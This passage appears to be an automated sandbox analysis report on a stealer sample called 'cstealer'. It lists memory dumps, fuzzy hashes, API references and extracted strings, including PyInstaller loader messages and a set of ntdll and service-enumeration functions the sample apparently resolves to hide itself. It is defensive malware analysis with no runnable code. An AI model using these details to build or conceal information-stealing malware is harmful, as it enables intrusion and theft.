• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID:
• API String ID: 4070488512-0
• Opcode ID: 5c0435bc803def4f3738399755070787ba0f20d1cbf8e98db8d8e06c31f37944
• Instruction ID: f4d094dc957da16a5febb5a586ea862ea5c8519281cf234029129a5788dc941f
• Opcode Fuzzy Hash: 5c0435bc803def4f3738399755070787ba0f20d1cbf8e98db8d8e06c31f37944
• Instruction Fuzzy Hash: 69D1AEA2A0A26286E730AF32EA501F967E1FF44F94F4441B6EE4D87695DF3DEC418740
APIs
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: f3d77d60e417bce1f0fe908812719be64cab24703666754eed0168e01bd0a785
• Instruction ID: ff5072309d7d45a0b5e2e6ac79323c9942986b5feac1f9f276ea43900ae4f00f
• Opcode Fuzzy Hash: f3d77d60e417bce1f0fe908812719be64cab24703666754eed0168e01bd0a785
• Instruction Fuzzy Hash: AC315036608B8185E770DF25E8442EE73A4FB88B94F540176EA9D87B94EF3CD6458B00
APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                            • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                            • Instruction ID: 8d74fd7fe591eacc9f86bf1893a7a89fa3646e460c99804f6260bc516c8545e3
                                                                                                                                                            • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                            • Instruction Fuzzy Hash: C2315172219B808AEB70CFA9E84439E73A4FB89754F500925EB9D47B94EF38C565CF00
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                            • Opcode ID: d3b5a9ccb4e88c159cf9a045586edc927c7d7f7f2097a371a70039bbbe86ddba
                                                                                                                                                            • Instruction ID: 3c868de219bbddd9ed03fd26d0da392749f704c56294911123bac0f26b316cd9
                                                                                                                                                            • Opcode Fuzzy Hash: d3b5a9ccb4e88c159cf9a045586edc927c7d7f7f2097a371a70039bbbe86ddba
                                                                                                                                                            • Instruction Fuzzy Hash: ACB1AF26B1A6A641EE71DB35DA006F963D1EB44FE4F444173EE5E87B89DEBCE8418300
                                                                                                                                                            APIs
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF695806DFA
                                                                                                                                                              • Part of subcall function 00007FF695806548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69580655C
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF695806E0B
                                                                                                                                                              • Part of subcall function 00007FF6958064E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6958064FC
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF695806E1C
                                                                                                                                                              • Part of subcall function 00007FF695806518: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69580652C
                                                                                                                                                              • Part of subcall function 00007FF6957FB700: HeapFree.KERNEL32(?,?,?,00007FF695803B72,?,?,?,00007FF695803BAF,?,?,00000000,00007FF695804075,?,?,00000000,00007FF695803FA7), ref: 00007FF6957FB716
                                                                                                                                                              • Part of subcall function 00007FF6957FB700: GetLastError.KERNEL32(?,?,?,00007FF695803B72,?,?,?,00007FF695803BAF,?,?,00000000,00007FF695804075,?,?,00000000,00007FF695803FA7), ref: 00007FF6957FB720
                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69580705C), ref: 00007FF695806E43
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3458911817-0
                                                                                                                                                            • Opcode ID: 55e3cc8bac5369d910ed4892b15b2a588c4a2811a75c0baad495c27a87ccf3ce
                                                                                                                                                            • Instruction ID: b4e0906300c28ed5b119b6432cb6919ee731fb3e14402f1c0b75f00060dd7909
                                                                                                                                                            • Opcode Fuzzy Hash: 55e3cc8bac5369d910ed4892b15b2a588c4a2811a75c0baad495c27a87ccf3ce
                                                                                                                                                            • Instruction Fuzzy Hash: 91516F72A1966286E730DF32EA811E9A7E0FF48F84F4441B6EA4DC7695DF3CE8418750
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                            • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                            • Instruction ID: 250e34395ab81a5c595c50e6da9b4650fc3d02a78714bafce1ce502a16152bfb
                                                                                                                                                            • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                            • Instruction Fuzzy Hash: 48115E72715F018EEF10CFA8E8593A933A4FB19758F440E21EB6D467A5DF78C1A88780
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                                                                                            • Instruction ID: 9d4ba4bfcc8f1e7e0d1dbcd0bd423141c702a5298d6a41c17131bbc341101cd1
                                                                                                                                                            • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                                                                                            • Instruction Fuzzy Hash: 6C51B3327096808DFF309FBAA94879A7BA5BB44794F144D15EE5C27FD5EA38C425CB00
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                                                                                            • Instruction ID: d22bc305dbd5f7ce225b4f605fc8fde636dcf19937e4989c7c663fcfcb8e9ca5
                                                                                                                                                            • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                                                                                            • Instruction Fuzzy Hash: 28F062B17292948FDBA98F6CA80671A77E1F708380FD08469D6CD83B04D63C8060CF04
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b04046989d87c8dc885ed01c2b3f2aaa9c0b13633c97905e42662c4d2108a614
                                                                                                                                                            • Instruction ID: 656790d11d6094e284f15c35b931dd6f6c50fb71ff2bf6567e6383014573eafe
                                                                                                                                                            • Opcode Fuzzy Hash: b04046989d87c8dc885ed01c2b3f2aaa9c0b13633c97905e42662c4d2108a614
                                                                                                                                                            • Instruction Fuzzy Hash: A1A00165919952D0E6749B10A9560B062A4EB51B08B4100B2D02E954A09E3CA9458300
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc
• String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 190572456-4266016200
• Opcode ID: 849092ee313d90182648ac5091f6841dd271f5938a0293141bcf3cafd9cdb4f6
• Instruction ID: b6d85abd710de6182123d4eb57af4eaff86aefd07679e4d4f3b61590801c4ed6
• Opcode Fuzzy Hash: 849092ee313d90182648ac5091f6841dd271f5938a0293141bcf3cafd9cdb4f6
• Instruction Fuzzy Hash: 3512C065A0FB2790FB75DB24AA941F423E1EF05F55B5454B6D80E8A3A4EF7CBE488300
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
• Instruction ID: 525f12fe7fea4898394b34cf501151e69b70c52a1fd7d241e78888ee5a7812d7
• Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
• Instruction Fuzzy Hash: 1C516272205B448AEB60CFAAE54835B77A1FB88F85F444525DB4E07B99EF3CC065CB00
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: Message
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
• API String ID: 2030045667-3833288071
• Opcode ID: 263c3a39bbe89d09fcae742a522d57215d3d8a93d8e70c9f31ee8f05d866201c
• Instruction ID: f2713b426959d4a3671fb8d8d6a14f6e267ddd74ed464b7eb4e59a16f9dd6c3c
• Opcode Fuzzy Hash: 263c3a39bbe89d09fcae742a522d57215d3d8a93d8e70c9f31ee8f05d866201c
• Instruction Fuzzy Hash: DE517B61B0978286EB309B25E5562F9A3D1FF45FD4F4440B2DE4DCB6A5EE6CEA48C300
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
• API String ID: 4175298099-1975688563
• Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
• Instruction ID: 4531d0168b37ae59c167cf0243d09ffc4f1335f1b5287f9d9daaa4c8f1a5e577
• Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
• Instruction Fuzzy Hash: DD31B7B410B90AE8EE26EFEDE8697D52360BF04744F900D53D44D12BE1AE3C8269CF60
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
• API String ID: 190073905-1786718095
• Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction ID: 602f0d8ba35c23c5c9fc0ca8855d52922af5ae43ebffbd69c8650dcd1cbf8e53
• Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction Fuzzy Hash: 2C81EF7161F6418EFA70AFED944C399B792AF85780F148C259B0D43796EB78C8B68F00
APIs
• GetLastError.KERNEL32 ref: 00000271DC67CE37
• FlsGetValue.KERNEL32(?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CE4C
• FlsSetValue.KERNEL32(?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CE6D
• FlsSetValue.KERNEL32(?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CE9A
• FlsSetValue.KERNEL32(?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CEAB
• FlsSetValue.KERNEL32(?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CEBC
• SetLastError.KERNEL32 ref: 00000271DC67CED7
• FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CF0D
• FlsSetValue.KERNEL32(?,?,00000001,00000271DC67ECCC,?,?,?,?,00000271DC67BF9F,?,?,?,?,?,00000271DC677AB0), ref: 00000271DC67CF2C
  • Part of subcall function 00000271DC67D6CC: HeapAlloc.KERNEL32 ref: 00000271DC67D721
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CF54
  • Part of subcall function 00000271DC67D744: HeapFree.KERNEL32 ref: 00000271DC67D75A
  • Part of subcall function 00000271DC67D744: GetLastError.KERNEL32 ref: 00000271DC67D764
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CF65
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000271DC680A6B,?,?,?,00000271DC68045C,?,?,?,00000271DC67C84F), ref: 00000271DC67CF76
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: Value$ErrorLast$Heap$AllocFree
• String ID:
• API String ID: 570795689-0
• Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
• Instruction ID: b1520f05b3cb90a356aebe994484967ae7a153129be9054fa1cd9836e56d08ac
• Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
• Instruction Fuzzy Hash: 4941583020F6446DFE78AFFD555D7A922825F947B0F240F24A93E46BE6FE2884719E01
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: Message_fread_nolock
• String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
• API String ID: 3065259568-2316137593
• Opcode ID: 10be7354ae7ed2204115d902d03c55829f90979370bef0a99dab41979069eecf
• Instruction ID: 15fde05d5233a79c4f92457ce111f515aae73b55e88589291479c972fdb792b2
• Opcode Fuzzy Hash: 10be7354ae7ed2204115d902d03c55829f90979370bef0a99dab41979069eecf
• Instruction Fuzzy Hash: 8E519261B0978246EB30EB21A4552FA63D4EF45FC4F504071EE4DCBBA5EE6CEE499300
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: -$:$f$p$p
• API String ID: 3215553584-2013873522
• Opcode ID: d41d3ed49e0df0b37e7753a00fe59ce424ede8ed11cb6504f669504b003b63f2
• Instruction ID: b66471f0a7c6396a3935d96cfdee6ddaf33586b40be2b6da98c41ef17952a964
• Opcode Fuzzy Hash: d41d3ed49e0df0b37e7753a00fe59ce424ede8ed11cb6504f669504b003b63f2
• Instruction Fuzzy Hash: 1B129362A0C183A6FB34DA14E04467D76E1FF80F54F944175EE9A8A6C4DF3CEE84AB11
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
• Opcode ID: d738f100ea2c585e80d131aafbe2a69e2e0acbd3b76fe5cf90b2b638373c2978
• Instruction ID: 347974fc2d94b1460cce67802108c934f28b85e7e3c9b73d6b57d816681c5eac
• Opcode Fuzzy Hash: d738f100ea2c585e80d131aafbe2a69e2e0acbd3b76fe5cf90b2b638373c2978
• Instruction Fuzzy Hash: 4912A362E0D18386FB34DA15D05427976E1FB80B54FD44175EE9A8AAC4DF7CEE80EB10
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
• String ID: CreateProcessW$Error creating child process!
